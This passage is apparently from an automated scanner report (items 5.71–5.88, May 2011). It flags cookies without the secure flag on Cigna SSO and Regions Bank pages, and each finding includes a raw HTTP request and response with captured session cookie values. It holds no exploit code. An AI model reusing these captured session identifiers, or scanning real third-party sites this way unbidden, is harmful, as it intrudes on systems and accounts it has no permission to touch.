The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/header_forgot_password.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=74B632B07FD1107FC7D4A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:42 GMT
Content-length: 1858
Content-type: image/gif
Set-Cookie: TLTHID=76094A447FD1107FC7EAA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "50bef55a-8-0-742"
Last-modified: Sat, 10 Jan 2004 21:45:32 GMT
Accept-ranges: bytes

GIF89a..........k..7............q.............y...........Y..t..D..#y...............................................................................i.....D......n....c..........................Q......
...[SNIP]...
5.71. https://sso.corp.cigna.com/corp/sso/images/pshim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/pshim.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/pshim.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "4c740010-1-0-327"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7FF807FD9107F0898A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.72. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/truesecure.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/truesecure.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "8bbd1376-1-0-c0f"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA13387FD9107F089AA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.73. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/yahoo_logo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/yahoo_logo.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "c45c439f-1-0-65"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA49AC7FD9107F089EA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.74. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "4ceaf758-1-0-a3d"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=4D8EA84A7FD9107F04F9A536181C0CE6; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:27:33 GMT
Set-Cookie: TLTHID=67A13BF87FD9107F05A8A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com

5.75. https://sso.corp.cigna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: TLTHID=78D4C8B67FD1107FC7FFA536181C0CE6; Path=/; Domain=.cigna.com

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
5.76. https://www.regions.com/App_Themes/2010/Ems.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/Ems.css

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/Ems.css HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: text/css
Last-Modified: Wed, 09 Mar 2011 20:07:58 GMT
Accept-Ranges: bytes
ETag: "02323af95decb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT
Content-Length: 21952

.../*****************************/
/* Web Channel Services: Base
/*****************************/
.foo{}

/*****************************/
/* HTML General
/*****************************/
body, h
...[SNIP]...
5.77. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticBackgrounds.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/img/staticBackgrounds.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/App_Themes/2010/Ems.css
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 799
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

GIF89a.....`............................................................................................................................................................................................
...[SNIP]...
5.78. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticFlyouts.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/2010/img/staticFlyouts.png HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 9597
Content-Type: image/png
Last-Modified: Mon, 04 Apr 2011 20:18:00 GMT
Accept-Ranges: bytes
ETag: "08cb2645f3cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:21 GMT

.PNG
.
...IHDR...~.........D.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..%.IDATx...].\.y......T.....,Y.E.vC.R...U/
.J.........a..r...[.I."M.."n.....F.....6.j..b..
T\....a....-.
..,...
...[SNIP]...
5.79. https://www.regions.com/App_Themes/2010/img/staticImages.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /App_Themes/2010/img/staticImages.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App_Themes/2010/img/staticImages.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/App_Themes/2010/Ems.css
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 9783
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:06 GMT

GIF89a..^.......Y....T...z........b........d.9..q.g.i.....r........q.....]...Q..........Kk...........y..[....V........^.2yyyN.........h............>T...........m..........f9[....|.Yf.....g.....s.Ov...
...[SNIP]...
5.80. https://www.regions.com/Img/sm_558800_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /Img/sm_558800_oo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Img/sm_558800_oo.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 597
Content-Type: image/gif
Last-Modified: Thu, 23 Sep 2010 14:37:00 GMT
Accept-Ranges: bytes
ETag: "08edcc72c5bcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:00 GMT

GIF89a    .    ....fff...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...
5.81. https://www.regions.com/JS/cmbd-jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /JS/cmbd-jquery.min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/cmbd-jquery.min.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 73452
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 18:41:00 GMT
Accept-Ranges: bytes
ETag: "04635a7a5cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT

...//*********** jquery-1.4.2.min.js *******
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.aj
...[SNIP]...
5.82. https://www.regions.com/JS/loadMedia.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /JS/loadMedia.min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/loadMedia.min.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Tue, 05 Apr 2011 18:24:58 GMT
Accept-Ranges: bytes
ETag: "039b9c4bef3cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:01 GMT
Content-Length: 35261

...var agt=navigator.userAgent.toLowerCase();var is_major=parseInt(navigator.appVersion);var is_minor=parseFloat(navigator.appVersion);var is_nav=((agt.indexOf("mozilla")!=-1)&&(agt.indexOf("spoofer")
...[SNIP]...
5.83. https://www.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Tue, 21 Dec 2010 20:53:00 GMT
Accept-Ranges: bytes
ETag: "01e6fd51a1cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:06 GMT

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
5.84. https://www.regions.com/js/_bt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/_bt.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/_bt.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:08:58 GMT
Accept-Ranges: bytes
ETag: "0b994a976fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:00 GMT
Content-Length: 990

//if bt_test is true before executing this script the iframe will load on uat
//
//if bt_extra is declared as an associative array before executing this script all members of the array will be added
...[SNIP]...
5.85. https://www.regions.com/js/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /js/wtbase.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/wtbase.js HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 14:09:58 GMT
Accept-Ranges: bytes
ETag: "0ff57cd76fbcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:02 GMT
Content-Length: 13718

function DcsInit(){
   this.dcsid="dcs4b71fc10000gs8u88h5t1k_6n2i";
   this.domain="statse.webtrendslive.com";
   this.enabled=true;
   this.exre=(function(){
       if (window.RegExp){
           return(new RegExp(
...[SNIP]...
5.86. https://www.regions.com/virtualMedia/img2612.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2612.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2612.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 38403
Content-Type: image/jpeg
Last-Modified: Tue, 10 May 2011 16:53:30 GMT
Accept-Ranges: bytes
ETag: "e030abca32fcc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:24 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
5.87. https://www.regions.com/virtualMedia/img3090.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3090.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3090.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 6969
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 18:47:12 GMT
Accept-Ranges: bytes
ETag: "b0509dafd45cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
5.88. https://www.regions.com/virtualMedia/img3094.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3094.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

